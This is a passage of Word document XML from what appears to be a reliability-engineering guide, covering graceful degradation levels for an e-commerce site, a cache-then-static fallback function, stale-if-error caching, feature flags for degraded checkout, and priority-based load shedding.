        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA0D1D6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Graceful degradation principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9EB4FD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  System should provide SOME value even when components fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45923B3B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Not: all-or-nothing (either perfect or completely down)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F720CD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  But: calibrated degradation (less capability, not zero capability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B20E32" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD77711" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Degradation levels (example: e-commerce site):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFFBE63" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Level 0 (fully operational):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6737B581" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Personalized recommendations, real-time inventory, payment processing, reviews</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3AF206" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7363BA0D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Level 1 (search/discovery degraded):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E577D0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Inventory service down → show "check availability in cart"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25324067" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Recommendation service down → show popular items (cached)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DD8118" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AE28BF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Level 2 (payment degraded):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5DF59D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Payment service down → show "complete purchase via phone"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA453CA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Queue orders for processing when service recovers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212F385D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B92024E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Level 3 (basic browse only):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6F3EDC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Database read replicas only → read-only mode → cannot place orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CB2D34" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Serve static product catalog from CDN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E91EEF8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F897A15" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Level 4 (maintenance page):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481D573D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Static page explaining outage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A8904F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ETA for recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B4F5AC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Status page URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41B28E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756BE114" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Automated degradation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A6A0E5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Health check for each capability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017748F0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Business logic: if capability unavailable → use degraded alternative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5835C733" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2227C938" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Stale cache fallback:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5F388A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Primary data: fetch from database (fresh, authoritative)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F09061C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Cache: serve from Redis (may be slightly stale)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583C434D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEEC6BA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Normal: database is fast → serve from database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A9AAC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Database slow/down: serve from cache (may be stale by minutes/hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1C8ECE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Cache miss + database down: serve from static fallback data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249F31E8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4A462F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7335B1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    def get_product(product_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DF9F1F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      # Try primary source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E8173F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD07B18" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        product = database.get(product_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0F0BD4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        cache.set(f"product:{product_id}", product, ttl=3600)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7845A21F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        return product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226984DC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      except DatabaseError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451AC0AA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E244F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA3A969" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      # Fallback to cache (potentially stale)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA7229E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      product = cache.get(f"product:{product_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE802CD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      if product:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C078E5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        log.warning("serving stale product from cache", product_id=product_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEABDF0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        return product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7485645F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C687597" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      # Fallback to static data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E73FD0C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      log.error("cache miss and database down, using static data", product_id=product_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BF6B03" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      return STATIC_PRODUCT_CATALOG.get(product_id, DEFAULT_PRODUCT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547907AA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4227D9BA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Stale-if-error Cache-Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD88DAA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    HTTP cache header: Cache-Control: max-age=60, stale-if-error=86400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BF651C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    CDN: serve stale content for up to 24 hours if origin is unavailable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1496BF69" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Browser: serve stale content if revalidation fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7639E99F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C467BB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Feature flags for degradation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CC4B39" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Instead of code branching: runtime feature flags control behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536E9ED3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CFEBAE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  def checkout(cart_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249142B0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    if feature_flags.enabled("real_time_inventory_check"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B8108F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      inventory = inventory_service.check(cart.items)  # may fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776027BF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE1B682" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      inventory = assume_all_available()  # degraded mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74237742" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA31D9C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    # ... rest of checkout ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB39C3F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287E0E08" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  On inventory service failure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ED072D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Operator disables "real_time_inventory_check" flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E38FAA6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Checkout: proceeds without inventory check (risk: oversell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF4A012" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Better: some orders possibly oversold vs: entire checkout broken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ADD6B7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4912EDD7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  LaunchDarkly / Unleash: feature flag services with remote control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763B3641" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  flipt, flagsmith: self-hosted alternatives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589D640E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load Shedding — Protecting Capacity During Overload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29146473" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5E50D2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Load shedding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534F2EE0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  When system is overloaded: proactively reject some requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC6361F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Counterintuitive: rejecting requests improves overall service quality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12170893" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B0A38E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Without load shedding under overload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7F423F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    All requests queued → all experience high latency → all fail their timeouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1D458C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    System collapses → effective throughput = near zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0203D2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5961C8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  With load shedding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52093555" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Excess requests rejected immediately (clear error, fast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464FEB80" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Accepted requests: normal service (no queuing → normal latency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030A5D61" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Effective throughput = capacity (maximum achievable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FACF77A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699EE7B9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Priority-based load shedding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102CA456" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Not all requests are equal in business value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA941F3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4753BE6D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Priority tiers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BD2972" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    P0: health checks, payment processing, session auth → never shed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEBF00D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    P1: product search, checkout → shed last</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F650375" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    P2: recommendations, reviews, analytics → shed first</w:t>
      </w:r>
    </w:p>
